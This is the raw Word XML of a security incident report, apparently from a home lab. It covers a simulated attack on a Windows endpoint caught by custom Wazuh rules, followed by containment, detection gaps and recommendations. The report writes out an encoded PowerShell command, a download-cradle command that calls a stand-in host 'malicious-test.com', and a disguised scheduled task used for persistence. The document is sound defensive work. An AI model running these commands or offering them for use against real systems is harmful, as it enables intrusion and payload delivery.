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b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Report — IR-2026-001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Field</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Incident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IR-2026-001</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April 23, 2026</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Analyst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Ronak Mishra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Resolved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Affected Endpoint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RONAKMISHRA345C (10.0.0.32)</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Method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Custom Wazuh detection rules 100002, 100003, 100006</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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On April 23, 2026, a multi-stage attack was detected against endpoint RONAKMISHRA345C (10.0.0.32). The attacker began with a brute force authentication attack, then executed encoded PowerShell commands attempting to download a second-stage payload, and finally established persistence via a malicious scheduled task.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack was detected by custom Wazuh detection rules. The affected endpoint was isolated, the malicious scheduled task was removed, and the system was verified clean before being brought back online. Total time from first detection to containment: 54 minutes.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Timeline of Events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="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116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Time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Event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Rule Fired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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11:31:50</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Multiple failed logon attempts detected — first wave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100006</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11:32:23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Continued brute force activity — second wave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100006</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11:42:44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Encoded PowerShell execution detected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100002</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11:42:44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 download cradle detected (same timestamp)</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100003</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11:52:53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Malicious scheduled task WindowsUpdateHelper created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4698 (Event)</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12:25:00</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Endpoint isolated via agent_control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Manual action</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t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Total duration from first event to persistence establishment: 21 minutes.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Technical Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Initial Access: Brute Force (T1110)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker launched a brute force attack against the endpoint using the username fakeattacker. Two separate waves of failed authentication were detected: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Authentication Protocol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NTLM (Network LAN Manager)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Logon Type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3 — Network logon (remote authentication)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Source IP</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 (localhost in this simulation)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Username targeted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fakeattacker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Wordlist used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rockyou.txt — 14 million real passwords from previous breaches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Execution: Encoded PowerShell (T1059.001 + T1105)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">At 11:42:44, two alerts fired simultaneously — confirming these were part of the same attack sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 100002 — Encoded Command: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoded: Invoke-WebRequest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker used base64 encoding to hide the true intent of the command. The encoding was defeated by Windows Script Block Logging (Event ID 4104) and Rule 100002.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 100003 — Download Cradle: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -Command "Invoke-WebRequest http://malicious-test.com/payload"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker attempted to download a second-stage payload from an external server. If successful, this would have loaded malware directly into memory — a fileless attack leaving no file on disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Persistence: Scheduled Task (T1053.005)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">At 11:52:53, the attacker created a scheduled task for persistent access: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Task Name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WindowsUpdateHelper (chosen to blend in with legitimate Windows tasks)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On every user logon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Run As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SYSTEM (highest privilege level)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Command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powershell.exe -enc cGluZyBnb29nbGUuY29t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Decoded Command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ping google.com (in a real attack: reverse shell or malware execution)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The task name was deliberately chosen to appear legitimate. Without SIEM monitoring, this task would survive reboots and re-execute the attacker payload on every login.</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Indicators of Compromise (IOCs)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Type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Username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fakeattacker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Brute force target username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URL</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http://malicious-test.com/payload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Second-stage download URL</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Scheduled Task</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WindowsUpdateHelper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Malicious persistence mechanism</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Encoded Payload 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SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0</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Decodes to Invoke-WebRequest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Encoded Payload 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cGluZyBnb29nbGUuY29t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Decodes to ping google.com</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MITRE Techniques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T1110, T1059.001, T1105, T1053.005</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Attack techniques used</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Response Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint RONAKMISHRA345C isolated via Wazuh agent_control -i 001 at 12:25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolation prevents lateral movement to other systems while investigation continues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh monitoring maintained during isolation for continued visibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Eradication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious scheduled task WindowsUpdateHelper deleted via: schtasks /delete /tn WindowsUpdateHelper /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User accounts reviewed — no unauthorized accounts found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Running services reviewed — no malicious services found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No malware files found on disk (fileless attack — download failed before payload execution)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Agent brought back online via agent_control -b 001 after eradication verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring level increased on affected host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom detection rules confirmed still active and functioning</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Detection Gaps Identified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Gap</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Network reconnaissance undetected</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Nmap port scanning generated zero Wazuh alerts. No visibility into network-level activity without a network IDS integration.</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Deploy Suricata IDS integrated with Wazuh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Modern Windows 11 blocks Hydra</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Hydra brute force against SMB/RDP generated zero 4625 events. Windows 11 rejects connections before NTLM handshake.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See Detection Gap document for full analysis</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Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Deploy Suricata Network IDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrate Suricata with Wazuh to add network-level detection. This would catch Nmap scans, port probes, and brute force traffic before it reaches the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Implement Account Lockout Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure Windows to lock accounts after 5 failed attempts for 30 minutes. Stops brute force regardless of SIEM detection thresholds and works against slow attacks that stay under rule thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Enable MFA on All Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Even if an attacker obtains the correct password, MFA prevents authentication without the second factor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lower Brute Force Detection Threshold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Current Rule 100006 requires 5 failures in 120 seconds. Consider adding a second rule at 3 failures in 300 seconds to catch slower attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Block PowerShell Encoded Commands via Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Defender Application Control (WDAC) can block PowerShell -enc execution entirely. This would have stopped the attack at the execution phase.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Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Speed of Detection Matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From first brute force attempt to persistence establishment was 21 minutes. Earlier detection and faster containment would have prevented the scheduled task from being created.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Multiple Detection Layers Are Essential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The encoded PowerShell was caught by two rules simultaneously (100002 and 100003). Overlapping detections mean an attacker cannot bypass one rule and go undetected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Decoding is a Critical First Response Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The first action when seeing an encoded command in an alert should always be to decode the payload. echo [base64] | base64 -d takes five seconds and immediately reveals attacker intent.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2026-04-24T02:46:59.189Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-24T02:46:59.189Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>